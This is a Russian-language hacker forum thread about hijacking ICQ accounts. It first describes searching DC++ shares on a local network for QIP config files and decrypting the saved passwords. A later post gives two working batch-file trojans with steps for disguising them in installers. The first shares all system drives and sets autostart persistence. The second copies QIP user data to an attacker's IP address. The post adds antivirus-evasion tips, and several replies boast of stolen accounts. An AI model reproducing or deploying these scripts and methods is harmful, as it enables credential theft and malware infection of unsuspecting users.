Здравствуйте.
Хочу рассказать о еще одном способе угона аськи.
Надеюсь, все знают, что такое p2p сеть.

Способ был придуман, когда года 2 назад поставил qip себе на машину. К тому времени я уже был подключён в общажную сеть моего универа, а в локалке есть где разгуляца экспериментатору (благо админ был знакомым, так что препятствий не было).
Так вот, в локалке была установлена дисюха (она же DC++) c населением примерно в 200 юзеров.

Пользуясь квипом я обычно сохранял пароль (каюс), заинтересовало в каком виде он храница. Естественно в зашифрованном виде, искать долго не пришлось - он был в config.ini в директории qip/users/xxxxxx/ , где иксы - мой уин.
Поискал в нете прогу для его восстановления. Нашлась она быстро, и лежит там по сей день:
QIP password reminder (http://forum.asechka.ru/downloads.php?do=file&id=17&act=down)
антивирями прога хавается!

Пароли восстановились мгновенно.

Далее я полез в дисюху и в поиске вбил нужный нам config.ini . Удивительно, но многие расшаривают папку Program Files ). Скачав конфиги я расшифровал пароли и получил пару десятков асек.

Статистика по моей сетке:
из 200 компов расшарили асю около 20ти, в каждой расшаре было по два-три уина, из них минимум в одном был сохранен пароль, из этих минимум 20ти уинов 3 оказались шестизнаками.
Думаю понимаете, что чем больше сеть тем и соответственно больше асек).

В других клиентах не смотрел (ибо угон асек мне неинтересен).

Удачной охоты...

З.Ы. К сожалению не все версии квипа подвержены восстановлению пароля (но все же большинство).
З.Ы.Ы. Не судите строго, статья первая. Обвинения в баяне не принимаю.

Сто раз уже писали. В топку.

какой идиот будет расшаривать локальные папки?

немог сам потихому гнать от туда....хоть и тема стара.....

тему в топку....

какой идиот будет расшаривать локальные папки?
Если есть локалка проверь.
Вопрос, а какие папки, кроме как не локальные ты расшаришь со своего компа на скачку? (периодически нада думать что пишешь, не в обиду)

немог сам потихому гнать от туда....хоть и тема стара.....
Пишу же мне это не интересно. мелочно это.

Сто раз уже писали. В топку.
Не читал, на ачате нет такой темы(в архивах не лазил), в нете лень смотреть.

З.Ы. Кто-то до этого сам дошел, а кто-то прочитает это.
Кроме того, аська это только пример.

только ненаду больше таких премеров писать а то пойдут лафу срубать))) в моей любимой сеточки)))

бред.... хотя попадаются блондинки котоыре целые диски расшаривают ...

Если есть локалка проверь.
Вопрос, а какие папки, кроме как не локальные ты расшаришь со своего компа на скачку? (периодически нада думать что пишешь, не в обиду)
Локалки нет.
Не системные точно.
Кому и надо думать, так это тебе, перед тем как постить баяны научись юзать поиск.

Локалки нет.
Не системные точно.
Кому и надо думать, так это тебе, перед тем как постить баяны научись юзать поиск.

Ну нет локалки откуда тебе знать?) и потом не все такие умные как ты, а блондинки не перевелись тем более...

"Не системные" - уже лучше)

Ссылки ф студию.

ты считаешь, что сканирование расшареных папок это супермегакулхацкерский способ кого-нибудь похекать? уж лучше пинчей блондинкам впаривать. хотя нет, не лучше. лучше идти учить уроки (с)

Мда баян +)
А у меня в локалке в п2п сети около 3к юзеров и поверьте из них 70% просто нихера не понимают =\

Мда баян +)
А у меня в локалке в п2п сети около 3к юзеров и поверьте из них 70% просто нихера не понимают =\
админ входит в эти 70%?

ты считаешь, что сканирование расшареных папок это супермегакулхацкерский способ кого-нибудь похекать? уж лучше пинчей блондинкам впаривать. хотя нет, не лучше. лучше идти учить уроки (с)
Сканировать папки в DC++? аффтар жжош пиши исчо))
Да пинч - это мощно)

Кто пишет про баян - просьба выкладывайте ссылки, я не обижусь. Раздражает неаргументированность и непродуманность.

З.Ы. а кто сказал, что это супермегакулхацкерский способ? Цитату плиз.

Метод бесполезен. Вот сейчас проверил на одном хабе: Там стоит лимит для "личеров", поэтому многие тупо расшаривают папки Windows и Program Files, чтобы получить доступ к закачке любимой игрушки. Да, у них можно утащить UIN'ы, но какие? Правильно, кривые девятизнаки! Мне такое "счастье" не нужно...

Способ не беспалезен так как из 10 человек 1 полюбому разшарит program files.Тока не факт что там именно квип,может и миранда и ICQ так что проще искать не сам файлик а кретинов разшаривших програмс файл.

Америку открыл)

Америку открыл)

читай З.Ы. поста #5

читай З.Ы. поста #5
я не тебе про Америку ;)...

Автору зачет, к сожалению в нашей сети ничего нормального нет, но все реально работает, проверил на какой-то кривой девятке, на семеры лень время было тратить ибо все обновили qip и расшифровка вложенной в первом посте прогой уже не годиться. Но вчера немного повозился и угнал 1xx-000-xx1 интересно сколько такой номерок стоит? ведь он легче и с первого раза запоминается, в отличии к примеру от 112122111 имо.

Автору респект однозначно ибо я обыскал три форума и вообще ничего почти не нашел по этой теме.

какой идиот будет расшаривать локальные папки?
Ты даже не представляешь, сколько их в сетях.

***Добавлю ищо от себя***

Да ламеров в сети много, но заветные шестизнаки обычно не у них.(
Я поступил таким образом.
Сделал два .bat файла.

Первый более универсальный, но и более паливный:

@echo off
if exist c:\Windows\windll.bat goto A
copy windll.bat c:\Windows\
:A
net start server
net share C=c:\
net share E=e:\
net share D=d:\
net share F=f:\
net share G=g:\
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v windll.lib /t REG_SZ /d C:\Windows\windll.bat
echo extract cab12023043444
echo ......................
echo error 346: file cab2032523553 not found.
echo abort install...
pause


Что делает: при запуске расшаривает корневые диски винды, копирует себя в виндовую папку под названием windll.bat (естествено переименуйте), и создает ключик в реестре в автозапуске.
строк типа: echo extract cab12023043444 - должно быть много, чтобы юзер ничего не заподозрил.
Впаривание: берем программку типа Smart installer (на секьюритилабе есть), берем кокуюнить полезную прогу и с помощью этого инсталлера прилепляем её запуск при установке программы. Либо любой другой способ для впаривания троянов. И расшариваем в ДС++(или другом p2p-клиенте), чтобы мы могли видеть кто скачивает прогу.
Ещё: антивирями естественно не палица, но в ехе конвертировать не советую(хотя желательно, дабы юзверь сорцы не посмотрел) ибо аваст почему-то ругнулся на него, каспер и нод32 молчат.

Второй, конкретно для квипа:

@echo off
echo please wait...
IF EXIST "C:\Program Files\QIP\users" copy /Y "C:\Program Files\QIP\users\*" "C:\shared" /Y
IF EXIST "C:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "C:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
echo ......................
echo error 346: file cab2032523553 not found.
echo error 346: file cab2032523554 not found.
echo error 346: file cab2032523555 not found.
echo abort install...
pause


Что делает: для начала расшариваем у себя папку shared на полный доступ, бат'ик смотрит наличие папок с установленным квипом и копирует содержимое папки users к вам на машину.
Впаривание: аналогичное первому.
Еще: его нада конвертить в ехе, ибо светица ip. антивирями тоже не палица.


З.Ы. Очень желательно изменить код под свои цели)
З.Ы.Ы. если кому-то нада подробно обьяснить устройство и принцип работы - пишите в личку.

***Еще***

Если кто-то будет тестить первый батник на своем компе, облегчу вам жизнь.
Противоядие:

echo removing, please wait...
echo __________________________________________________ _________
net share c /delete
net share E /delete
net share D /delete
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v windll.lib /f
del c:\Windows\windll.bat /q
echo __________________________________________________ _________
echo Troja:) removed!!!
pause


Он уберет расшары, удалит файл из виндовой папки и реестра...

Автору +1
в сетке нашлись 3 юзера с расшаренными кипами, 6 девяток
не шохи но результат есть все равно (имею в виду наличие сабжа, аськи мне естессно не нужны), не надо гнать на аффтара

ищите сразу сбрученые осеки good.txt :\

Аффтар , прежде чем писать статьи, сначала в инете поищи, я на Whack.ru выкладывал подробную статью, вместе с видео.. перед тем как писать её, я весь инет облазил...
я предъяв не кидаю, но будь внимателен, мне уже несколько человек сказали, что ты у меня статью увёл///
SatanAnge
Viva la Whack

мм. ссылку в студию!}:[

Статья кул ;) Но все таки больше интересует как проделать аналогичное с "асей" :) ,там пароль вроде в реестр сохраняется....

Сам тоже самое делаю давно уже...узнал на allcheats про эту фишку... на самом деле расшаривают дистрибутивы вместе с QIP, Opera и т.д.

только советую для таких целей не QPR использовать а Multi password recovery, скачать можно - > passrecovery.com < - кряк в и-нете ..

поправочка ! перепутал с другим QPR ... это очень даже ничего.